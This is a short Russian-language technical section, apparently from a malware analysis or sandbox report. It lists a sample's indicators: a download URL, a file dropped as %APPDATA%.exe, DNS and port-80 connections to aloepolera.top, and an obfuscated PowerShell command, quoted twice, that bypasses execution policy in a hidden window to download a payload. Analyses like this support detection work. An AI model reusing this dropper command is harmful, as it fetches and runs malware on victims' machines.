Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^WErsH^EL^L^.^exE -EXe^cuT^IoNP^Ol^IcY^ Byp^aSs^ ^-^N^O^PR^O^f^Il^e -wi^n^d^O^wst^yLe ^h^i^d^dE^N (^nEw-OBjecT sYs^TeM.N^e^t.webcLie^N^t).^DownloaD^fi^Le('http://aloepolera.top/rea...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /C "Po^WErsH^EL^L^.^exE -EXe^cuT^IoNP^Ol^IcY^ Byp^aSs^ ^-^N^O^PR^O^f^Il^e -wi^n^d^O^wst^yLe ^h^i^d^dE^N (^nEw-OBjecT sYs^TeM.N^e^t.webcLie^N^t).^DownloaD^fi^Le('http://aloepolera.top/rea...' (со скрытым окном)